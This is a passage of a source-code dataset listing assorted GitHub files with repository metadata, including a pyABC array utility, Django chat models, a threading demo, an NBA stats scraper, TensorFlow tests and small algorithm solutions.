calc_function()
|
[
"info@hackbrightacademy.com"
] |
info@hackbrightacademy.com
|
89b03a17f56e9843db582338bc395c1f2fea79cf
|
9724c8cd81ad39f7f9a2419e2873d7d74cb10c72
|
/pyabc/util/dict2arr.py
|
1e205cc289c9abf58cf89c4e2a29997249c9bcd2
|
[
"BSD-3-Clause"
] |
permissive
|
ICB-DCM/pyABC
|
36b7fc431fe4ba4b34d80d268603ec410aeaf918
|
d1542fb201edca86369082e1fc7934995e3d03a4
|
refs/heads/main
| 2023-09-01T13:42:52.880878
| 2023-08-18T16:55:04
| 2023-08-18T16:55:04
| 96,995,608
| 187
| 49
|
BSD-3-Clause
| 2023-08-18T16:55:05
| 2017-07-12T10:30:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,995
|
py
|
"""Transform dictionaries to arrays."""
from numbers import Number
from typing import List, Union
import numpy as np
import pandas as pd
def dict2arr(dct: Union[dict, np.ndarray], keys: List) -> np.ndarray:
    """Flatten dictionary values into one 1d array, in the given key order.

    Parameters
    ----------
    dct: Dict-like whose entries are data frames, ndarrays, or single
        numbers.  An ndarray is returned unchanged (already converted).
    keys: Keys of interest; also fixes the concatenation order.

    Returns
    -------
    arr: 1d array of all concatenated values.

    Raises
    ------
    TypeError: If any value is not a frame, array, or number.
    """
    if isinstance(dct, np.ndarray):
        return dct
    chunks = []
    for key in keys:
        val = dct[key]
        if isinstance(val, (pd.DataFrame, pd.Series)):
            chunks.append(val.to_numpy().flatten())
        elif isinstance(val, np.ndarray):
            chunks.append(val.flatten())
        elif isinstance(val, Number):
            chunks.append([val])
        else:
            raise TypeError(
                f"Cannot parse variable {key}={val} of type {type(val)} "
                "to numeric."
            )
    # Fast path: a single entry needs no re-concatenation.
    if len(chunks) == 1:
        return np.asarray(chunks[0])
    return np.asarray([item for chunk in chunks for item in chunk])
def dict2arrlabels(dct: dict, keys: List) -> List[str]:
    """Build the label list matching `dict2arr`'s flattened output.

    Call once (e.g. on the observed data) and reuse for logging.

    Parameters
    ----------
    dct: Model output or observed data.
    keys: Keys of interest; also fixes the order.

    Returns
    -------
    labels: One label per flattened scalar, consistent with `dict2arr`.
    """
    labels: List[str] = []
    for key in keys:
        val = dct[key]
        if isinstance(val, (pd.DataFrame, pd.Series)):
            # Row-major to mirror the default 'C' flattening order.
            labels.extend(
                f"{key}:{col}:{row}"
                for row in range(len(val.index))
                for col in val.columns
            )
        elif isinstance(val, np.ndarray):
            # Arrays can have any dimension, so use flat indices.
            labels.extend(f"{key}:{ix}" for ix in range(val.size))
        elif isinstance(val, Number):
            labels.append(key)
        else:
            raise TypeError(
                f"Cannot parse variable {key}={val} of type {type(val)} "
                "to numeric."
            )
    return labels
def io_dict2arr(fun):
    """Decorator parsing a dict first argument into an ndarray.

    Assumes the data argument comes right after `self`, and that `self`
    exposes an `x_keys` attribute giving the key order.
    The wrapped function's ndarray result is flattened before returning.
    """
    def wrapped_fun(self, data: Union[dict, np.ndarray], *args, **kwargs):
        # Normalise the input to a 1d array in self.x_keys order.
        arr = dict2arr(data, self.x_keys)
        result: np.ndarray = fun(self, arr, *args, **kwargs)
        return result.flatten()
    return wrapped_fun
|
[
"noreply@github.com"
] |
ICB-DCM.noreply@github.com
|
0e88de598b1ad3a47bce2fd27367d2c995ed185d
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2_neat/16_0_2_mck_B.py
|
357542136cb2949d40fc809ea50ad4ecaec00794
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 576
|
py
|
import sys
def flip(x, list):
    """Invert every pancake sign in list[0..x] in place; return the list.

    "-" becomes "+", anything else becomes "-" (matching the original's
    if/else), so only "+"/"-" inputs are meaningful.
    """
    for idx in range(x + 1):
        list[idx] = "+" if list[idx] == "-" else "-"
    return list
def getLastIndexOfN(list):
    """Return the index of the last "-" in the list, or -1 if none exists."""
    for idx in reversed(range(len(list))):
        if list[idx] == "-":
            return idx
    return -1
if __name__ == "__main__":
    # Code Jam "Revenge of the Pancakes": each flip of the prefix ending at
    # the last "-" reduces the number of sign runs; count flips to all "+".
    tests = int(sys.stdin.readline())
    for test in range(1, tests + 1):
        s = sys.stdin.readline().replace("\n", "")
        s = [i for i in s]
        ans = 0
        while "-" in s:
            ans += 1
            s = flip(getLastIndexOfN(s), s)
        print ("Case #" + str(test) + ": " + str(ans))
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
aea17cef7dbd0f04529c1d5463ea0f6bfcb948fc
|
af9268e1ead8cdb491868c14a2240d9e44fb3b56
|
/Cousinade/polls/migrations/0001_initial.py
|
6363a01cf03b7608b2f3dd7940be9dd6cb4cd7dd
|
[] |
no_license
|
frosqh/Cousinade2017
|
d5154c24c93ca8089eeba26b53c594e92cb6bd82
|
c34d5707af02402bf2bb7405eddc91297da399ff
|
refs/heads/master
| 2021-01-20T07:57:34.586476
| 2017-10-22T18:42:45
| 2017-10-22T18:42:45
| 90,074,802
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,053
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-15 23:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import polls.models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Author and Photos
    tables (Photos.author cascades on Author deletion)."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Author',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('authorName', models.CharField(default='anonymous', max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Photos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('photo', models.ImageField(upload_to=polls.models.user_directory_path)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Author')),
            ],
        ),
    ]
|
[
"frosqh@gmail.com"
] |
frosqh@gmail.com
|
17d3ff2a36f1adcf56dde4f95f0754a323175ca0
|
eb736f1412e434522687190685ccdae9ba722b58
|
/Lab Exercise 2.3.2021/Cars/cars2.py
|
2f49598a60b1672ee3390830cbfe517e22323420
|
[] |
no_license
|
nmessa/C_Sharp-2021
|
4a008853f4cf9fa8a617a5fcadaad964fc30c84c
|
1124d4ab106a6a2204b98019b36f495f4167a12b
|
refs/heads/main
| 2023-06-05T15:35:13.734371
| 2021-06-15T12:43:02
| 2021-06-15T12:43:02
| 332,059,776
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
#Closest approach of 2 cars
##Car1 traveling north currently 2 miles south of junction at a rate of 30 MPH
##Car2 traveling west currently 3 miles east of jucntion at a rate of 40 MPH
##Find the closest distance the two cars approach
from math import *
from pylab import *
import time
# Sweep pairs of car speeds (MPH); car1 starts 2 miles from the junction,
# car2 starts 3 miles away.  t is in seconds, so speed/3600 is miles/second
# (assumes Python 3 true division -- under Python 2 this would be 0).
collisions = []
for speed1 in range(1, 50):
    for speed2 in range(1,50):
        times = []
        distances = []
        t = 0
        while True:
            car1 = 2 - speed1/3600 * t
            car2 = 3 - speed2/3600 * t
            distance = sqrt(car1**2 + car2**2)
            if car1 < 0 and car2 < 0:
                break
            distances.append(distance)
            times.append(t)
            t += 1
        # NOTE(review): this tests only the *last* distance computed before
        # the break (both cars already past the junction), not the minimum
        # over the trajectory -- presumably min(distances) was intended;
        # confirm before relying on `collisions`.
        if distance < 0.01:
            collisions.append((speed1, speed2))
##        plot(times, distances)
##        grid(True)
##        show()
print(collisions)
##Solution
##0.2 miles at time 259 seconds
|
[
"noreply@github.com"
] |
nmessa.noreply@github.com
|
35b87aaf0cdcfdb706a1d081dce7b88de2b2f8a8
|
2ea4e667bdcd82565fca8ac96f74ee08bd67364e
|
/backend/chat/models.py
|
a2d82fbe6251955d52dea8721a5990fc822a0ba3
|
[] |
no_license
|
crowdbotics-apps/wadduplyapp-24147
|
39dff74efbdb15feaf1bde54dd9f6679b9c786ed
|
19436f48d03dcc22807e9e331bb371a546f1dc9d
|
refs/heads/master
| 2023-02-23T23:24:25.213934
| 2021-01-29T21:09:30
| 2021-01-29T21:09:30
| 334,259,663
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,152
|
py
|
from django.conf import settings
from django.db import models
class ThreadAction(models.Model):
    """Generated model: an action a profile performed on a thread.

    The semantics of the 7-char ``action`` code are not visible here --
    check the generating spec / callers.
    """
    action = models.CharField(
        max_length=7,
    )
    thread = models.ForeignKey(
        "chat.Thread",
        on_delete=models.CASCADE,
        related_name="threadaction_thread",
    )
    profile = models.ForeignKey(
        "chat_user_profile.Profile",
        on_delete=models.CASCADE,
        related_name="threadaction_profile",
    )
    # Stamped automatically at row creation.
    timestamp_action = models.DateTimeField(
        auto_now_add=True,
    )
class ForwardedMessage(models.Model):
    """Generated model: records a message being forwarded by a profile
    into another thread, with the forwarding time."""
    message = models.ForeignKey(
        "chat.Message",
        on_delete=models.CASCADE,
        related_name="forwardedmessage_message",
    )
    forwarded_by = models.ForeignKey(
        "chat_user_profile.Profile",
        on_delete=models.CASCADE,
        related_name="forwardedmessage_forwarded_by",
    )
    forwarded_to = models.ForeignKey(
        "chat.Thread",
        on_delete=models.CASCADE,
        related_name="forwardedmessage_forwarded_to",
    )
    # Stamped automatically at row creation.
    timestamp_forwarded = models.DateTimeField(
        auto_now_add=True,
    )
class MessageAction(models.Model):
    """Generated model: an action a profile performed on a single message
    (7-char code; semantics not visible here)."""
    action = models.CharField(
        max_length=7,
    )
    message = models.ForeignKey(
        "chat.Message",
        on_delete=models.CASCADE,
        related_name="messageaction_message",
    )
    profile = models.ForeignKey(
        "chat_user_profile.Profile",
        on_delete=models.CASCADE,
        related_name="messageaction_profile",
    )
    # Stamped automatically at row creation.
    timestamp_action = models.DateTimeField(
        auto_now_add=True,
    )
class Message(models.Model):
    """Generated model: one chat message in a thread.

    NOTE(review): ``timestamp_delivered`` / ``timestamp_read`` are declared
    without ``null=True``, so rows cannot be saved before delivery/read --
    confirm that is intended.
    """
    message = models.TextField()
    thread = models.ForeignKey(
        "chat.Thread",
        on_delete=models.CASCADE,
        related_name="message_thread",
    )
    # Sender is the thread membership, not the profile directly.
    sent_by = models.ForeignKey(
        "chat.ThreadMember",
        on_delete=models.CASCADE,
        related_name="message_sent_by",
    )
    attachment = models.URLField()
    is_draft = models.BooleanField()
    is_delivered = models.BooleanField()
    is_read = models.BooleanField()
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    timestamp_delivered = models.DateTimeField()
    timestamp_read = models.DateTimeField()
class Thread(models.Model):
    """Generated model: a chat thread (name, photo, creation time)."""
    name = models.CharField(
        max_length=255,
    )
    thread_photo = models.URLField()
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
class ThreadMember(models.Model):
    """Generated model: membership of a profile in a thread.

    NOTE(review): ``timestamp_left`` / ``last_rejoined`` lack ``null=True``
    despite describing events that may never happen -- confirm intent.
    """
    profile = models.ForeignKey(
        "chat_user_profile.Profile",
        on_delete=models.CASCADE,
        related_name="threadmember_profile",
    )
    thread = models.ForeignKey(
        "chat.Thread",
        on_delete=models.CASCADE,
        related_name="threadmember_thread",
    )
    is_admin = models.BooleanField()
    timestamp_joined = models.DateTimeField(
        auto_now_add=True,
    )
    timestamp_left = models.DateTimeField()
    last_rejoined = models.DateTimeField()
# Create your models here.
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
c72650b3a9bf00b1efe3f5361b5d09a436c259cc
|
48390374bb000e593a192ba5981210b130ebff1e
|
/using_threads/t3_locks.py
|
3587dac6018618c0cf77b26f789f228f06185810
|
[] |
no_license
|
onionmccabbage/beyondAdvancedPythonApril2021
|
396615bb3c1989e0e57ae818950135250ce9ea33
|
0abccebcff1d0ff2e05f1f3b0188763fa3929920
|
refs/heads/main
| 2023-06-01T22:47:49.855370
| 2021-06-16T12:12:29
| 2021-06-16T12:12:29
| 360,176,678
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 998
|
py
|
import threading
import time
import random
counter = 1
lock = threading.Lock()
def workerA():
    """Increment the shared counter up to 100.

    The lock is acquired for the *entire* loop, so the other worker cannot
    interleave until this one finishes -- the coarse locking is the point
    of this demo.
    """
    global counter
    lock.acquire()
    try:
        while counter <100:
            counter += 1
            print( 'Worker A is incrementing counter to {}'.format(counter) )
    except Exception as e:
        print(e)
    finally:
        # Always release, even if printing/incrementing raised.
        lock.release()
def workerB():
    """Decrement the shared counter down to -100, holding the lock for the
    whole loop (mirror image of workerA)."""
    global counter
    lock.acquire()
    try:
        while counter >-100:
            counter -= 1
            print( 'Worker B is decrementing counter to {}'.format(counter) )
    except Exception as e:
        print(e)
    finally:
        lock.release()
def main():
    """Run both workers concurrently and report the elapsed wall time."""
    started = time.time()
    workers = [
        threading.Thread(target=workerA),
        threading.Thread(target=workerB),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    elapsed = time.time() - started
    print('Execution took {} seconds'.format(elapsed))

if __name__ == '__main__':
    main()
|
[
"noreply@github.com"
] |
onionmccabbage.noreply@github.com
|
2d7f069d13b7e23eb16fe01d25ac2cbd1a0d3e43
|
9714a7e31c922dea5187ef09de7c7095bda515e1
|
/visualization/api/ShotsDash.py
|
5c65ee274340933206fb8e4127309f18d9abfc70
|
[] |
no_license
|
rd11490/Russell
|
5104c846bccc52b2456dadb0e3a85af22169006f
|
b1f2c4c96a04a492bc5d1a0596f9bbc40a696e9d
|
refs/heads/master
| 2022-07-11T03:51:29.155850
| 2019-12-31T05:21:58
| 2019-12-31T05:21:58
| 104,696,236
| 5
| 1
| null | 2022-06-20T23:50:29
| 2017-09-25T02:50:00
|
Scala
|
UTF-8
|
Python
| false
| false
| 1,585
|
py
|
import json
import pandas as pd
import urllib3
# NBA player IDs to pull shot-dashboard data for.
players = [1628369, 1627759,202954,202681,1626179,202694,202330,1628464,1627824,203935,1628400,201143,203382]

def build_ulr(player):
    """Return the stats.nba.com playerdashptshots URL for *player*
    (2018-19 regular season, totals).  Name kept as-is ("ulr") because
    callers below use it."""
    return (
        "https://stats.nba.com/stats/playerdashptshots?DateFrom=&DateTo=&"
        "GameSegment=&LastNGames=0&LeagueID=00&Location=&Month=0&"
        "OpponentTeamID=0&Outcome=&PerMode=Totals&Period=0&"
        f"PlayerID={player}&Season=2018-19&SeasonSegment=&"
        "SeasonType=Regular+Season&TeamID=0&VsConference=&VsDivision="
    )
# Browser-like request headers -- stats.nba.com rejects requests without a
# plausible User-Agent/Referer.
header_data = {
    'Host': 'stats.nba.com',
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',
    'Referer': 'stats.nba.com',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
# Shared connection pool for all requests below.
http = urllib3.PoolManager()
def extract_data(url, player):
    """Fetch one player's shot dashboard and return result set index 4 as
    a DataFrame, with a ``player`` column appended.

    NOTE: result set 4's meaning (presumably the defender-distance split)
    comes from the API's response ordering.
    """
    print(url)
    response = http.request('GET', url, headers=header_data)
    payload = json.loads(response.data)
    result_set = payload['resultSets'][4]
    columns = result_set['headers']
    columns.append("player")
    frame = pd.DataFrame(result_set['rowSet'])
    frame["player"] = player
    frame.columns = columns
    return frame
# Download every player's dashboard and write the concatenation to CSV.
frames = []
for player in players:
    url = build_ulr(player)
    data = extract_data(url, player)
    frames.append(data)
out = pd.concat(frames)
out.to_csv("CsDefenderDist.csv")
|
[
"rd11490@gmail.com"
] |
rd11490@gmail.com
|
26c794fa0e7c4d0f5ce7dd1b14ec5667ae7562db
|
e38692437085a48abba0d682ec9921e7c24bf122
|
/source/webapp/admin.py
|
db2c1391a590d746ca795f1daf03d514497964ea
|
[] |
no_license
|
Aitmatow/farids_blog
|
f7a9e57c18957a1a08b66aff349904ad3b948cbc
|
cc92853ea8e2ac362df8bee4740d98280e7aefed
|
refs/heads/master
| 2023-04-27T23:07:51.848466
| 2019-10-22T12:58:23
| 2019-10-22T12:58:23
| 215,323,364
| 0
| 0
| null | 2023-04-21T20:38:49
| 2019-10-15T14:44:35
|
Python
|
UTF-8
|
Python
| false
| false
| 678
|
py
|
from django.contrib import admin
from webapp.models import Article, Comment, Category, Tag
class CommentAdmin(admin.TabularInline):
    """Inline editor for an article's comments (author + text only)."""
    model = Comment
    fields = ['author', 'text']
    # Don't show extra blank comment rows by default.
    extra = 0
class ArticleAdmin(admin.ModelAdmin):
    """Admin configuration for Article: list columns, filters, search,
    inline comments, and read-only timestamps."""
    list_display = ['pk', 'title', 'author', 'created_at']
    list_filter = ['author', 'category']
    list_display_links = ['pk', 'title']
    search_fields = ['title', 'text']
    # NOTE(review): an empty exclude list is a no-op; kept as-is.
    exclude = []
    filter_horizontal = ['tags']
    readonly_fields = ['created_at', 'updated_at']
    inlines = [CommentAdmin]
# Register models; only Article gets a custom admin class.
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"aitmarowd@gmail.com"
] |
aitmarowd@gmail.com
|
d2ff3964c849c9dfa4f125ea4f263ed8cc60c79e
|
68e76ef27df38b0fe2c1c993a9c15896563f950d
|
/2 Практика Робот/robot-tasks-master/task_32.py
|
a6c5bd5d73d6bf5f60c3579c8d427f1c5c882714
|
[] |
no_license
|
Jumas-Cola/mipt_cs_on_python3_answers
|
72e9341656daa4afa35f8d39de917eb5471ee132
|
a2d128c4ce391bdeea6d20eb955855ad5bc5a0b4
|
refs/heads/master
| 2020-03-27T23:44:09.088994
| 2019-07-29T13:55:35
| 2019-07-29T13:55:35
| 147,341,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
#!/usr/bin/python3
from pyrob.api import *
@task(delay=0.01)
def task_8_18():
    # Walk the robot right along the bottom wall until it reaches the right
    # wall; in each column with a passage above, climb to the top filling
    # empty cells and counting already-filled ones, then come back down.
    # Finally report the count of pre-filled cells via register ax.
    x=0
    while not (wall_is_on_the_right() and not wall_is_on_the_left()):
        if not wall_is_above() and wall_is_beneath():
            while not wall_is_above():
                move_up()
                if cell_is_filled():
                    x+=1
                else:
                    fill_cell()
            while not wall_is_beneath():
                move_down()
        else:
            fill_cell()
        move_right()
    # mov writes the tally into the pyrob "ax" register for checking.
    mov('ax',x)

if __name__ == '__main__':
    run_tasks()
|
[
"kbbyfl91@gmail.com"
] |
kbbyfl91@gmail.com
|
f57b234180126f5f12df6e7674e04017a4c1f047
|
7524bec2d88ca21750b09b83cc236cbfb6c61fea
|
/setup.py
|
be304e26ac19dc66f8ab4361a1a3074c10526e6b
|
[] |
no_license
|
ericbusboom/insteon
|
c3d25f65038624b0bd3a26cf526f7b3c22891916
|
f090231e197d517c24ee3b00a6143c2b1f0b89fc
|
refs/heads/master
| 2020-04-19T08:23:51.283619
| 2015-02-14T19:55:10
| 2015-02-14T19:55:10
| 9,122,856
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
from setuptools import setup, find_packages
# Package metadata for the esbinsteon Insteon-control tools: ships the
# esbinsteon package (with its bundled config files) and three CLI scripts.
setup(name='esbinsteon',
      version='1.0',
      description='Program to control an insteon interface. ',
      author='Eric Busboom',
      author_email='eric@busboom.org',
      url='http://busboom.org',
      packages=['esbinsteon'],
      package_data={'esbinsteon': ['config/*']},
      scripts=['scripts/insteon_schedule','scripts/insteon_switch', 'scripts/insteon_install'],
      install_requires=[
          'pyephem',
          'PyYAML',
          'python-dateutil'
      ],
      )
|
[
"eric@clarinova.com"
] |
eric@clarinova.com
|
7122016d14d9ea48aa260c13465ca27e234421c0
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/training/training_util_test.py
|
3ec83b7be7f95c031003a009aa40c63af02060b2
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232
| 2020-01-11T13:43:10
| 2020-01-11T13:43:10
| 230,088,347
| 0
| 0
|
Apache-2.0
| 2019-12-25T10:49:15
| 2019-12-25T10:49:14
| null |
UTF-8
|
Python
| false
| false
| 5,363
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
from tensorflow.python.training import training_util
@test_util.run_v1_only('b/120545219')
class GlobalStepTest(test.TestCase):
def _assert_global_step(self, global_step, expected_dtype=dtypes.int64):
self.assertEqual('%s:0' % ops.GraphKeys.GLOBAL_STEP, global_step.name)
self.assertEqual(expected_dtype, global_step.dtype.base_dtype)
self.assertEqual([], global_step.get_shape().as_list())
def test_invalid_dtype(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.Variable(
0.0,
trainable=False,
dtype=dtypes.float32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step, g)
def test_invalid_shape(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
[0],
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step, g)
def test_create_global_step(self):
self.assertIsNone(training_util.get_global_step())
with ops.Graph().as_default() as g:
global_step = training_util.create_global_step()
self._assert_global_step(global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step, g)
self._assert_global_step(training_util.create_global_step(ops.Graph()))
def test_get_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
0,
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self._assert_global_step(
training_util.get_global_step(), expected_dtype=dtypes.int32)
self._assert_global_step(
training_util.get_global_step(g), expected_dtype=dtypes.int32)
def test_get_or_create_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
self._assert_global_step(training_util.get_or_create_global_step())
self._assert_global_step(training_util.get_or_create_global_step(g))
@test_util.run_v1_only('b/120545219')
class GlobalStepReadTest(test.TestCase):
def test_global_step_read_is_none_if_there_is_no_global_step(self):
with ops.Graph().as_default():
self.assertIsNone(training_util._get_or_create_global_step_read())
training_util.create_global_step()
self.assertIsNotNone(training_util._get_or_create_global_step_read())
def test_reads_from_cache(self):
with ops.Graph().as_default():
training_util.create_global_step()
first = training_util._get_or_create_global_step_read()
second = training_util._get_or_create_global_step_read()
self.assertEqual(first, second)
def test_reads_before_increments(self):
with ops.Graph().as_default():
training_util.create_global_step()
read_tensor = training_util._get_or_create_global_step_read()
inc_op = training_util._increment_global_step(1)
inc_three_op = training_util._increment_global_step(3)
with monitored_session.MonitoredTrainingSession() as sess:
read_value, _ = sess.run([read_tensor, inc_op])
self.assertEqual(0, read_value)
read_value, _ = sess.run([read_tensor, inc_three_op])
self.assertEqual(1, read_value)
read_value = sess.run(read_tensor)
self.assertEqual(4, read_value)
if __name__ == '__main__':
test.main()
|
[
"v-grniki@microsoft.com"
] |
v-grniki@microsoft.com
|
3870e76c40ced6a801aa513970ff4feb772a2eac
|
c957b4663cc4cb21e5172f23c6989031be8c3e5b
|
/python/141. Linked List Cycle.py
|
2b938337525872e17fcb52a8afbee163e4aa0323
|
[] |
no_license
|
gajanlee/leetcode
|
e061dc37af0f83bf2bce00c391c0b8a9f3177b22
|
0d3c8477f05604a059e58a8764ce0d8bd418edde
|
refs/heads/master
| 2018-12-26T06:12:24.995542
| 2018-10-30T05:03:27
| 2018-10-30T05:03:27
| 102,965,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
"""
Given a linked list, determine if it has a cycle in it.
Follow up:
Can you solve it without using extra space?
"""
# 如果存在环,那么一个指针移动一个,另外一个移动两个,两个指针会相遇的
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if head is None: return False
l1, l2 = head, head.next
while l1 and l2 and l2.next:
if l1 == l2: return True
l1 = l1.next
l2 = l2.next.next
return False
|
[
"lee_jiazh@163.com"
] |
lee_jiazh@163.com
|
8fe28884609f1cd95401053f75ed6003569df8ab
|
2f14f8bccf15ccea2ff50e2f92164b43cb8f78b1
|
/Dynamic Programming/LeetCode/MinimumCostForTickets_983.py
|
a2fbbbecdcf36d899c75b0abeb0b3e3cc2e3c0ba
|
[] |
no_license
|
nikhiilll/Algorithms-using-Python
|
b3372f3ecca8e0c8e1358bb5a87391038a6630b6
|
8439864c637578d15915113564dbbf047b75b107
|
refs/heads/master
| 2023-02-10T23:09:31.312693
| 2020-12-24T16:56:29
| 2020-12-24T16:56:29
| 313,243,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
def minimumCostForTickets(days, costs):
costArray = [0 for i in range(days[-1] + 1)]
for i in range(1, days[-1] + 1):
if i not in days:
costArray[i] = costArray[i - 1]
else:
costArray[i] = min(costArray[max(0, i - 1)] + costs[0], costArray[max(0, i - 7)] + costs[1], costArray[max(0, i - 30)] + costs[2])
return costArray[-1]
print(minimumCostForTickets([1,4,6,7,8,20], [2,7,15]))
|
[
"pawarnikhilp@gmail.com"
] |
pawarnikhilp@gmail.com
|
0a8e33e5da3e1e73a09e33523e5636f64d2b3abd
|
9697a1ab85af91ee587623ac3089adb5dbbd6814
|
/configs/QCD_AOD__9_cfg.py
|
f0f4e8a89e9f22c748119952227009ee9236238a
|
[] |
no_license
|
nicholas-bower/myLowPtGsfElectronAnalyzer
|
e9bfaad71631fda4fa67e532015daef2f03edab5
|
d4558c124af04f09db9e51e468f8ac3268a940e5
|
refs/heads/master
| 2022-11-16T21:02:56.940840
| 2020-07-16T15:37:03
| 2020-07-16T15:37:03
| 280,191,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,818
|
py
|
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: test2 -s RAW2DIGI,L1Reco,RECO --datatier RECO --era=Run2_2018 --conditions auto:phase1_2018_realistic --eventcontent RECO --filein file:test.root --no_exec
import FWCore.ParameterSet.Config as cms
#f = open("/uscms_data/d3/nbower/FSU/TestLowPt/CMSSW_10_6_12/src/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/macros/fileLists/m50_ALP_fileList.txt","r")
f = open('./myLowPtGsfElectronsAnalyzer/macros/fileLists/QCD_AOD/QCD_AOD__9.txt','r')
infiles = f.readlines()
f.close()
from FWCore.ParameterSet.VarParsing import VarParsing
options = VarParsing ('python')
options.setDefault('maxEvents',-1)
options.setDefault('inputFiles',infiles)
options.parseArguments()
process = cms.Process('TEST') # ,eras.bParkingOpen
# import of standard configurations
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(options.maxEvents)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(options.inputFiles),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Output definition
# Path and EndPath definitions
process.load('myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer_cfi')
# Schedule definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('root://cmseos.fnal.gov//store/user/nbower/plots/QCD_LowPT/QCD_AOD__9.root')
)
process.p = cms.Path(process.simple)
# Customisation from command line
# End adding early deletion
#open('pydump.py','w').write(process.dumpPython())
|
[
"nbower@andrew.cmu.edu"
] |
nbower@andrew.cmu.edu
|
2da59e2885e26454205131e62eb8ef38c89aa7d9
|
0b05df6c954e5952369d544a878111798c83be59
|
/tensorpack/utils/argtools.py
|
743bbaeb089d21c8a3f3e77d64f1937b75fdeb8d
|
[
"Apache-2.0"
] |
permissive
|
SunskyF/tensorpack
|
